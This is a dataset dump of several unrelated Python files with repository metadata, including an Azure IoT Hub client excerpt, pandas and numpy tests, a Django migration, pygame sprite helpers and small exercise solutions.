private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _delete_initial(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> Optional[_models.PrivateEndpointConnection]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[Optional[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Delete private endpoint connection.
Delete private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
| [
"[email protected]"
] | |
10bcb6a6cca24a31397972415ea766cbddfa555c | 523f8f5febbbfeb6d42183f2bbeebc36f98eadb5 | /147_best.py | 3d1e8b37f5da10cd271490da0e35045823c72455 | [] | no_license | saleed/LeetCode | 655f82fdfcc3000400f49388e97fc0560f356af0 | 48b43999fb7e2ed82d922e1f64ac76f8fabe4baa | refs/heads/master | 2022-06-15T21:54:56.223204 | 2022-05-09T14:05:50 | 2022-05-09T14:05:50 | 209,430,056 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution(object):
def insertionSortList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head==None:
return None
l=ListNode(0)
p=head
while p!=None:
q=l
while q.next!=None and q.next.val<p.val :
q=q.next
np=p.next
p.next=q.next
q.next=p
p=np
return l.next
| [
"[email protected]"
] | |
ffbba23a3c4c45c2d06645337aa75f9d54d24f4c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_243/ch161_2020_06_15_19_33_27_198209.py | f921b1b82956792ae479cd3fccf38b2e9021b5f4 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | def PiWallis(num):
numerador=1
denominador=2
i=0
multi = 1
while i < num:
multi *= numerador/denominador
if i%2 == 0:
denominador += 2
else:
numerador += 2
i+=1
return multi | [
"[email protected]"
] | |
17443d48e14b9c51e3399739df9833c81a42bef8 | 886436fe7993aa2913e339ebe70b0eddfacac44c | /build/lib/armin/api/share/utils.py | e68eddb20a572579f23515d616640d6bb6bc3c91 | [] | no_license | singajeet/armin | 581793cac1ac3b1ab638d274b356965ee5d76750 | 99f61a0ce0f2d5c587002ddf8d2843e83d9538d3 | refs/heads/master | 2021-04-28T07:15:42.509397 | 2018-03-19T17:30:09 | 2018-03-19T17:30:09 | 122,219,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | """
.. module:: source_driver
:platform: Unix, Windows
:synopsis: A default implementation of source system driver
"""
from typing import Type, Dict, Any
import pathlib
from armin.api.share.constants import N, F, V
from tinydb import TinyDB, Query
def get_meta_table(meta_repo_details:Type[Dict]):
"""Returns the table from meta repo based on details passed as args
"""
__db_path = meta_repo_details[N.DB_URI]
if __db_path.find('~') >= 0:
__db_path = pathlib.Path(__db_path).expanduser()
else:
__db_path = pathlib.Path(__db_path).absolute()
__meta_db = TinyDB(__db_path)
if __meta_db is None:
return (F.FAILED, 'Unable to create instance of TinyDB')
__source_sys_meta_table = __meta_db\
.table(meta_repo_details[N.META_TABLE])
if __source_sys_meta_table is None:
return (F.FAILED, 'Inconsistent meta repo. Can not find source\
system details table - %s' % meta_repo_details[N.META_TABLE])
else:
return (F.SUCCESS, __source_sys_meta_table)
def connect_to_meta(meta_repo_details:Type[Dict], name:str) -> (Type[F], Any):
"""Connect to metadata database using the details provided asparameters in the constructor
Args:
meta_repo_details (Dict): Repository details for making connection and query
name (str): Name of the item that needs to be queried
Returns:
status (Tuple): Returns flag Success or Failed and details in case of failure and table record in case of success
"""
__record = None
(status, result_obj) = get_meta_table(meta_repo_details)
if status == F.SUCCESS:
__source_sys_meta_table = result_obj
__record = __source_sys_meta_table\
.get(Query()[N.NAME] == name)
else:
return (status, result_obj)
if __record is not None:
return (F.SUCCESS, __record)
return (F.FAILED, 'Record not found in meta repo')
| [
"[email protected]"
] | |
44ad04a59f6f8b2df27bfda02eaab12a2aa8d256 | 06a045819cf99c7059afde40dca12cf9d3eb5f81 | /pandas/tests/indexing/test_at.py | 01315647c464b7573433bf36515371ffed05e411 | [
"BSD-3-Clause"
] | permissive | MarcoGorelli/pandas | b9882c6ac1e4bc753819b7bc7c8b567964efd275 | 86a4ee01c7899ef454d35b95cde11e9593921c9d | refs/heads/main | 2023-08-22T12:35:45.122152 | 2023-05-04T22:11:07 | 2023-05-04T22:11:07 | 164,618,359 | 4 | 1 | BSD-3-Clause | 2023-05-05T09:02:23 | 2019-01-08T09:55:54 | Python | UTF-8 | Python | false | false | 7,983 | py | from datetime import (
datetime,
timezone,
)
import numpy as np
import pytest
from pandas.errors import InvalidIndexError
from pandas import (
CategoricalDtype,
CategoricalIndex,
DataFrame,
DatetimeIndex,
MultiIndex,
Series,
Timestamp,
)
import pandas._testing as tm
def test_at_timezone():
# https://github.com/pandas-dev/pandas/issues/33544
result = DataFrame({"foo": [datetime(2000, 1, 1)]})
result.at[0, "foo"] = datetime(2000, 1, 2, tzinfo=timezone.utc)
expected = DataFrame(
{"foo": [datetime(2000, 1, 2, tzinfo=timezone.utc)]}, dtype=object
)
tm.assert_frame_equal(result, expected)
def test_selection_methods_of_assigned_col():
# GH 29282
df = DataFrame(data={"a": [1, 2, 3], "b": [4, 5, 6]})
df2 = DataFrame(data={"c": [7, 8, 9]}, index=[2, 1, 0])
df["c"] = df2["c"]
df.at[1, "c"] = 11
result = df
expected = DataFrame({"a": [1, 2, 3], "b": [4, 5, 6], "c": [9, 11, 7]})
tm.assert_frame_equal(result, expected)
result = df.at[1, "c"]
assert result == 11
result = df["c"]
expected = Series([9, 11, 7], name="c")
tm.assert_series_equal(result, expected)
result = df[["c"]]
expected = DataFrame({"c": [9, 11, 7]})
tm.assert_frame_equal(result, expected)
class TestAtSetItem:
def test_at_setitem_item_cache_cleared(self):
# GH#22372 Note the multi-step construction is necessary to trigger
# the original bug. pandas/issues/22372#issuecomment-413345309
df = DataFrame(index=[0])
df["x"] = 1
df["cost"] = 2
# accessing df["cost"] adds "cost" to the _item_cache
df["cost"]
# This loc[[0]] lookup used to call _consolidate_inplace at the
# BlockManager level, which failed to clear the _item_cache
df.loc[[0]]
df.at[0, "x"] = 4
df.at[0, "cost"] = 789
expected = DataFrame({"x": [4], "cost": 789}, index=[0])
tm.assert_frame_equal(df, expected)
# And in particular, check that the _item_cache has updated correctly.
tm.assert_series_equal(df["cost"], expected["cost"])
def test_at_setitem_mixed_index_assignment(self):
# GH#19860
ser = Series([1, 2, 3, 4, 5], index=["a", "b", "c", 1, 2])
ser.at["a"] = 11
assert ser.iat[0] == 11
ser.at[1] = 22
assert ser.iat[3] == 22
def test_at_setitem_categorical_missing(self):
df = DataFrame(
index=range(3), columns=range(3), dtype=CategoricalDtype(["foo", "bar"])
)
df.at[1, 1] = "foo"
expected = DataFrame(
[
[np.nan, np.nan, np.nan],
[np.nan, "foo", np.nan],
[np.nan, np.nan, np.nan],
],
dtype=CategoricalDtype(["foo", "bar"]),
)
tm.assert_frame_equal(df, expected)
def test_at_setitem_multiindex(self):
df = DataFrame(
np.zeros((3, 2), dtype="int64"),
columns=MultiIndex.from_tuples([("a", 0), ("a", 1)]),
)
df.at[0, "a"] = 10
expected = DataFrame(
[[10, 10], [0, 0], [0, 0]],
columns=MultiIndex.from_tuples([("a", 0), ("a", 1)]),
)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("row", (Timestamp("2019-01-01"), "2019-01-01"))
def test_at_datetime_index(self, row):
# Set float64 dtype to avoid upcast when setting .5
df = DataFrame(
data=[[1] * 2], index=DatetimeIndex(data=["2019-01-01", "2019-01-02"])
).astype({0: "float64"})
expected = DataFrame(
data=[[0.5, 1], [1.0, 1]],
index=DatetimeIndex(data=["2019-01-01", "2019-01-02"]),
)
df.at[row, 0] = 0.5
tm.assert_frame_equal(df, expected)
class TestAtSetItemWithExpansion:
def test_at_setitem_expansion_series_dt64tz_value(self, tz_naive_fixture):
# GH#25506
ts = Timestamp("2017-08-05 00:00:00+0100", tz=tz_naive_fixture)
result = Series(ts)
result.at[1] = ts
expected = Series([ts, ts])
tm.assert_series_equal(result, expected)
class TestAtWithDuplicates:
def test_at_with_duplicate_axes_requires_scalar_lookup(self):
# GH#33041 check that falling back to loc doesn't allow non-scalar
# args to slip in
arr = np.random.randn(6).reshape(3, 2)
df = DataFrame(arr, columns=["A", "A"])
msg = "Invalid call for scalar access"
with pytest.raises(ValueError, match=msg):
df.at[[1, 2]]
with pytest.raises(ValueError, match=msg):
df.at[1, ["A"]]
with pytest.raises(ValueError, match=msg):
df.at[:, "A"]
with pytest.raises(ValueError, match=msg):
df.at[[1, 2]] = 1
with pytest.raises(ValueError, match=msg):
df.at[1, ["A"]] = 1
with pytest.raises(ValueError, match=msg):
df.at[:, "A"] = 1
class TestAtErrors:
# TODO: De-duplicate/parametrize
# test_at_series_raises_key_error2, test_at_frame_raises_key_error2
def test_at_series_raises_key_error(self, indexer_al):
# GH#31724 .at should match .loc
ser = Series([1, 2, 3], index=[3, 2, 1])
result = indexer_al(ser)[1]
assert result == 3
with pytest.raises(KeyError, match="a"):
indexer_al(ser)["a"]
def test_at_frame_raises_key_error(self, indexer_al):
# GH#31724 .at should match .loc
df = DataFrame({0: [1, 2, 3]}, index=[3, 2, 1])
result = indexer_al(df)[1, 0]
assert result == 3
with pytest.raises(KeyError, match="a"):
indexer_al(df)["a", 0]
with pytest.raises(KeyError, match="a"):
indexer_al(df)[1, "a"]
def test_at_series_raises_key_error2(self, indexer_al):
# at should not fallback
# GH#7814
# GH#31724 .at should match .loc
ser = Series([1, 2, 3], index=list("abc"))
result = indexer_al(ser)["a"]
assert result == 1
with pytest.raises(KeyError, match="^0$"):
indexer_al(ser)[0]
def test_at_frame_raises_key_error2(self, indexer_al):
# GH#31724 .at should match .loc
df = DataFrame({"A": [1, 2, 3]}, index=list("abc"))
result = indexer_al(df)["a", "A"]
assert result == 1
with pytest.raises(KeyError, match="^0$"):
indexer_al(df)["a", 0]
def test_at_frame_multiple_columns(self):
# GH#48296 - at shouldn't modify multiple columns
df = DataFrame({"a": [1, 2], "b": [3, 4]})
new_row = [6, 7]
with pytest.raises(
InvalidIndexError,
match=f"You can only assign a scalar value not a \\{type(new_row)}",
):
df.at[5] = new_row
def test_at_getitem_mixed_index_no_fallback(self):
# GH#19860
ser = Series([1, 2, 3, 4, 5], index=["a", "b", "c", 1, 2])
with pytest.raises(KeyError, match="^0$"):
ser.at[0]
with pytest.raises(KeyError, match="^4$"):
ser.at[4]
def test_at_categorical_integers(self):
# CategoricalIndex with integer categories that don't happen to match
# the Categorical's codes
ci = CategoricalIndex([3, 4])
arr = np.arange(4).reshape(2, 2)
frame = DataFrame(arr, index=ci)
for df in [frame, frame.T]:
for key in [0, 1]:
with pytest.raises(KeyError, match=str(key)):
df.at[key, key]
def test_at_applied_for_rows(self):
# GH#48729 .at should raise InvalidIndexError when assigning rows
df = DataFrame(index=["a"], columns=["col1", "col2"])
new_row = [123, 15]
with pytest.raises(
InvalidIndexError,
match=f"You can only assign a scalar value not a \\{type(new_row)}",
):
df.at["a"] = new_row
| [
"[email protected]"
] | |
3730426a331bcc75745f9af0cdfc8efaf059a9b9 | 8eab8ab725c2132bb8d090cdb2d23a5f71945249 | /virt/Lib/site-packages/numpy/array_api/tests/test_elementwise_functions.py | b2fb44e766f8adfc368d988bd7d17c2ac418b386 | [
"GPL-3.0-only",
"BSD-3-Clause-Open-MPI",
"GPL-3.0-or-later",
"GCC-exception-3.1",
"BSD-3-Clause",
"MIT"
] | permissive | JoaoSevergnini/metalpy | 6c88a413a82bc25edd9308b8490a76fae8dd76ca | c2d0098a309b6ce8c756ff840bfb53fb291747b6 | refs/heads/main | 2023-04-18T17:25:26.474485 | 2022-09-18T20:44:45 | 2022-09-18T20:44:45 | 474,773,752 | 3 | 1 | MIT | 2022-11-03T20:07:50 | 2022-03-27T22:21:01 | Python | UTF-8 | Python | false | false | 3,619 | py | from inspect import getfullargspec
from numpy.testing import assert_raises
from .. import asarray, _elementwise_functions
from .._elementwise_functions import bitwise_left_shift, bitwise_right_shift
from .._dtypes import (
_dtype_categories,
_boolean_dtypes,
_floating_dtypes,
_integer_dtypes,
)
def nargs(func):
return len(getfullargspec(func).args)
def test_function_types():
# Test that every function accepts only the required input types. We only
# test the negative cases here (error). The positive cases are tested in
# the array API test suite.
elementwise_function_input_types = {
"abs": "numeric",
"acos": "floating-point",
"acosh": "floating-point",
"add": "numeric",
"asin": "floating-point",
"asinh": "floating-point",
"atan": "floating-point",
"atan2": "floating-point",
"atanh": "floating-point",
"bitwise_and": "integer or boolean",
"bitwise_invert": "integer or boolean",
"bitwise_left_shift": "integer",
"bitwise_or": "integer or boolean",
"bitwise_right_shift": "integer",
"bitwise_xor": "integer or boolean",
"ceil": "numeric",
"cos": "floating-point",
"cosh": "floating-point",
"divide": "floating-point",
"equal": "all",
"exp": "floating-point",
"expm1": "floating-point",
"floor": "numeric",
"floor_divide": "numeric",
"greater": "numeric",
"greater_equal": "numeric",
"isfinite": "numeric",
"isinf": "numeric",
"isnan": "numeric",
"less": "numeric",
"less_equal": "numeric",
"log": "floating-point",
"logaddexp": "floating-point",
"log10": "floating-point",
"log1p": "floating-point",
"log2": "floating-point",
"logical_and": "boolean",
"logical_not": "boolean",
"logical_or": "boolean",
"logical_xor": "boolean",
"multiply": "numeric",
"negative": "numeric",
"not_equal": "all",
"positive": "numeric",
"pow": "numeric",
"remainder": "numeric",
"round": "numeric",
"sign": "numeric",
"sin": "floating-point",
"sinh": "floating-point",
"sqrt": "floating-point",
"square": "numeric",
"subtract": "numeric",
"tan": "floating-point",
"tanh": "floating-point",
"trunc": "numeric",
}
def _array_vals():
for d in _integer_dtypes:
yield asarray(1, dtype=d)
for d in _boolean_dtypes:
yield asarray(False, dtype=d)
for d in _floating_dtypes:
yield asarray(1.0, dtype=d)
for x in _array_vals():
for func_name, types in elementwise_function_input_types.items():
dtypes = _dtype_categories[types]
func = getattr(_elementwise_functions, func_name)
if nargs(func) == 2:
for y in _array_vals():
if x.dtype not in dtypes or y.dtype not in dtypes:
assert_raises(TypeError, lambda: func(x, y))
else:
if x.dtype not in dtypes:
assert_raises(TypeError, lambda: func(x))
def test_bitwise_shift_error():
# bitwise shift functions should raise when the second argument is negative
assert_raises(
ValueError, lambda: bitwise_left_shift(asarray([1, 1]), asarray([1, -1]))
)
assert_raises(
ValueError, lambda: bitwise_right_shift(asarray([1, 1]), asarray([1, -1]))
)
| [
"[email protected]"
] | |
0dcf4b6b5bcf74c86dfbcba79e56758e85c90377 | 08c7844a2bd2d94d16e851ce78109a7f33ffc53f | /config.py | 58407e73518f4329eb385d50488e096f33660915 | [] | no_license | jreiher2003/menu-app | dd5bd4a44688f43086f6a284684ebafff74daf2a | cc93f6a41539ab00b2d85bae21ee308987c93afe | refs/heads/master | 2021-01-10T09:26:51.673657 | 2015-11-17T19:11:25 | 2015-11-17T19:11:25 | 46,355,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess'
import os
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'menu.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository') | [
"[email protected]"
] | |
b517f0bb5ca6346a38ef4745c26d781ed5b2d2cd | e83f2198cb765f048398e6485f138cf4e172199f | /src/pywaz/sprite/__init__.py | 2b4fa577eabb5f9d7b1f852d71ca2119cee7f2c3 | [] | no_license | giginet/MachiMatch | 6d1c2cb2a77323043e8e04e90df5d5e1d8e010d5 | 69b0e788f75966bf6e2fbfaba19e66da5ce22415 | refs/heads/master | 2021-01-13T01:36:19.399768 | 2011-12-25T02:40:10 | 2011-12-25T02:40:10 | 1,630,776 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | import pygame
from pygame.sprite import Sprite
class _Mixin(object):
def draw(self, surface):
for sprite in self.sprites():
if isinstance(sprite, Sprite):
sprite.draw(surface)
else:
surface.blit(sprite.image, sprite.rect)
class _Mixin2(object):
def draw(self, surface):
spritedict = self.spritedict
surface_blit = surface.blit
dirty = self.lostsprites
self.lostsprites = []
dirty_append = dirty.append
for s in self.sprites():
r = spritedict[s]
if isinstance(s, Sprite):
newrect = s.draw(surface)
else:
newrect = surface_blit(s.image, s.rect)
if r is 0:
dirty_append(newrect)
else:
if newrect and newrect.colliderect(r):
dirty_append(newrect.union(r))
elif newrect:
dirty_append(newrect)
dirty_append(r)
spritedict[s] = newrect
return dirty
# group -----------------------------------------------------------------------------------
#
# Notice:
# The order of inheritation is IMPORTANT
#
class Group(_Mixin, pygame.sprite.Group):
pass
class RenderUpdates(_Mixin2, pygame.sprite.RenderUpdates):
pass
class OrderedUpdates(_Mixin2, pygame.sprite.OrderedUpdates):
pass
class LayeredUpdates(_Mixin2, pygame.sprite.LayeredUpdates):
pass
# collide ---------------------------------------------------------------------------------
#
# Notice:
# Only `collide_rect` and `spritecollide` is modified
#
from pygame.sprite import collide_rect_ratio
from pygame.sprite import collide_circle, collide_circle_ratio
from pygame.sprite import collide_mask
from pygame.sprite import groupcollide, spritecollideany
def collide_rect(left, right):
u"""collision detection between two sprites, using `colrect` of each sprite"""
return left.coltest_rect.colliderect(right.coltest_rect)
def spritecollide(sprite, group, dokill, collided = None):
if collided is None:
collided = collide_rect
return pygame.sprite.spritecollide(sprite, group, dokill, collided)
| [
"[email protected]"
] | |
5e7eae6b648b87e1195f66e8de1baf28ed5cc3b4 | 176088b355fd48f89aa377d1358bc54fd5d9d35d | /backend/task_category/migrations/0001_initial.py | 9093194c12138f4db006dc787f9880e94c74f40c | [] | no_license | crowdbotics-apps/fashion-by-genesis-18024 | bbf2c78adaefcaf5297b208a23d291ec8c7b0f0f | a725add80913c3ecb4f9e049baa3c78c8de3ffbd | refs/heads/master | 2022-10-26T19:09:33.359374 | 2020-06-11T18:21:20 | 2020-06-11T18:21:20 | 271,617,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py | # Generated by Django 2.2.13 on 2020-06-11 18:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('icon', models.URLField()),
('description', models.TextField(blank=True, null=True)),
('is_recurring', models.BooleanField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Subcategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='subcategory_category', to='task_category.Category')),
],
),
]
| [
"[email protected]"
] | |
5b93c2a71b7fe9860423932a99487ea380b7ad1b | e7307703a08ccdc0615bfa3b7a963a2ba2e9e732 | /bots/courses_bot/data_models/student_profile.py | 8f2b9d06af726a5cb4e8919a976c563d36878473 | [] | no_license | liyocee/cs_course_bot | 7817c43975c56aeb6edf31d28d9a7f553d107c26 | 93354ade3713293bf31a494a75bd11c3229814a8 | refs/heads/master | 2023-05-24T23:29:34.309303 | 2020-03-15T14:37:15 | 2020-03-15T14:37:15 | 246,835,877 | 0 | 0 | null | 2023-05-22T22:42:22 | 2020-03-12T13:03:32 | Python | UTF-8 | Python | false | false | 707 | py | from enum import Enum
from typing import Optional
from botbuilder.schema import Attachment
from .course_unit import CourseUnit
class StudentProfile:
def __init__(
self,
name: str = None,
admission_number: str = None,
course_unit: CourseUnit = None,
picture: Attachment = None
):
self.name: Optional[str] = name
self.admission_number: Optional[str] = admission_number
self.course_unit: Optional[CourseUnit] = course_unit
self.picture: Optional[Attachment] = picture
class StudentProfileAttributes(Enum):
NAME = "name"
ADMISSION_NUMBER = "admission_number"
COURSE_UNIT = "course_unit"
PICTURE = "picture"
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.